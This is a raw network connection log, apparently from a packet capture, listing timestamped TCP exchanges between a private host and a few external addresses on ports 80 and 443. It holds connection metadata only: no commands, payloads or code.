Dec 9, 2024 08:08:37.774842978 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.774874926 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.774892092 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.775752068 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.775796890 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.776062012 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.776110888 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.776711941 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.776751995 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.777057886 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.777101994 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.827959061 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.828016996 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.828018904 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.828061104 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.828166962 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.828186989 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.828208923 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.828223944 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.828584909 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.828670979 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.828710079 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.829106092 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.829124928 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.829164982 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.829667091 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.829704046 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.829720974 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.829741955 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.830277920 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.830290079 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.830327034 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.830338001 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.830811024 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.830903053 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.830919027 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.830933094 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.831500053 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.831542015 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.831598043 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.831655979 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.832161903 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.832279921 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.832319975 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.833096027 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.833137989 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.833197117 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.833236933 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.834059954 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.834094048 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.834176064 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.834214926 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.834997892 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.835038900 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.835094929 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.835134983 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.835932016 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.835973024 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.836033106 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.836076021 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.836873055 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.837025881 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.837063074 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.837896109 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.837949991 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.838094950 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.838133097 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.838875055 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.838910103 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.838948965 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.838988066 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.839699030 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.839739084 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.839802980 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.839838982 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.840619087 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.840759039 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.840795994 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.841607094 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.841654062 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.841685057 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.841722012 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.842508078 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.842547894 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.842632055 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.842672110 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.843456984 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.843497038 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.843549013 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.843585968 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.844400883 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.844505072 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.844546080 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.844743967 CET	80	49848	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:37.844796896 CET	49848	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:37.845312119 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.845360994 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.845385075 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.845422983 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.846262932 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.846318007 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.846369982 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.846410036 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.847220898 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.847290039 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.847351074 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.848012924 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:37.848166943 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.848258018 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.848294020 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:37.848306894 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.849107981 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.849165916 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.849219084 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.849275112 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.850084066 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.850138903 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.850162983 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.850202084 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.850948095 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.851001978 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.851052046 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.851093054 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.851918936 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.851970911 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.852008104 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.852082014 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.852828026 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.852879047 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.852935076 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.852977991 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.853791952 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.853832960 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.853863001 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.853904009 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.854734898 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.854795933 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.854830980 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.854870081 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.855657101 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.855706930 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.855736971 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.855778933 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.892505884 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.892575979 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.892647982 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.892772913 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.892817020 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.892868042 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.892910004 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.893747091 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.893793106 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.893812895 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.893867016 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.894649982 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.894701004 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.894762039 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.894804001 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.895613909 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.895663977 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.895670891 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.895701885 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.967489004 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:37.967607975 CET	80	49829	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:37.967710018 CET	49829	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:37.968060017 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:37.969082117 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:38.088274002 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:38.124010086 CET	443	49845	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:38.124113083 CET	443	49845	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:38.125129938 CET	49845	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:38.125497103 CET	49845	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:38.125521898 CET	443	49845	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:38.125534058 CET	49845	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:38.125540018 CET	443	49845	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:38.206918955 CET	49855	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:38.206964970 CET	443	49855	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:38.207024097 CET	49855	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:38.207278967 CET	49855	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:38.207292080 CET	443	49855	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:39.309267044 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.309315920 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.309329033 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.309340954 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.309354067 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.309366941 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.309392929 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.309434891 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.309556961 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.309568882 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.309580088 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.309592962 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.309601068 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.309612036 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.309643984 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.419610023 CET	443	49855	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:39.419683933 CET	49855	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:39.439263105 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.439403057 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.439450979 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.501404047 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.501492977 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.501554012 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.505606890 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.505724907 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.505774975 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.514066935 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.514220953 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.514266014 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.522471905 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.522516012 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.522566080 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.522623062 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.530833006 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.530879974 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.530930042 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.530966997 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.538336039 CET	49855	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:39.538412094 CET	443	49855	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:39.538465023 CET	49855	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:39.539119005 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.539161921 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.539242983 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.539288998 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.547590971 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.547631025 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.547669888 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.547707081 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.555951118 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.555991888 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.556072950 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.556128979 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.564374924 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.564452887 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.564496040 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.564533949 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.572746992 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.572834015 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.572861910 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.572882891 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.581041098 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.581100941 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.671581984 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.671658993 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.671668053 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.671701908 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.675662994 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.675704002 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.693489075 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.693551064 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.693571091 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.693634987 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.694864035 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.694921970 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.694983006 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.695060015 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.699520111 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.699618101 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.699645996 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.699687004 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.704169989 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.704257965 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.704288960 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.704343081 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.708888054 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.708956957 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.708969116 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.709007025 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.713639975 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.713686943 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.713774920 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.713818073 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.718209982 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.718251944 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.718321085 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.718359947 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.722883940 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.722959042 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.722990990 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.723050117 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.727581978 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.727711916 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.727755070 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.732238054 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.732357979 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.732387066 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.732425928 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.736906052 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.736948967 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.737016916 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.737056017 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.741641998 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.741677999 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.741739988 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.741890907 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.746273041 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.746331930 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.746376038 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.746412039 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.751112938 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.751163960 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.751336098 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.751766920 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.756130934 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.756191015 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.756223917 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.756241083 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.760278940 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.760320902 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.760410070 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.760660887 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.764976025 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.765010118 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.863614082 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.863711119 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.863756895 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.863771915 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.865721941 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.865772963 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.865832090 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.865869999 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.869858027 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.869910955 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.885473967 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.885523081 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.885627985 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.885670900 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.887214899 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.887259007 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.887877941 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.887921095 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.888029099 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.888072014 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.891450882 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.891494989 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.891556978 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.891593933 CET	49854	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:39.895103931 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.895277977 CET	80	49854	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:39.895347118 CET	49854	80	192.168.2.4	185.215.113.16
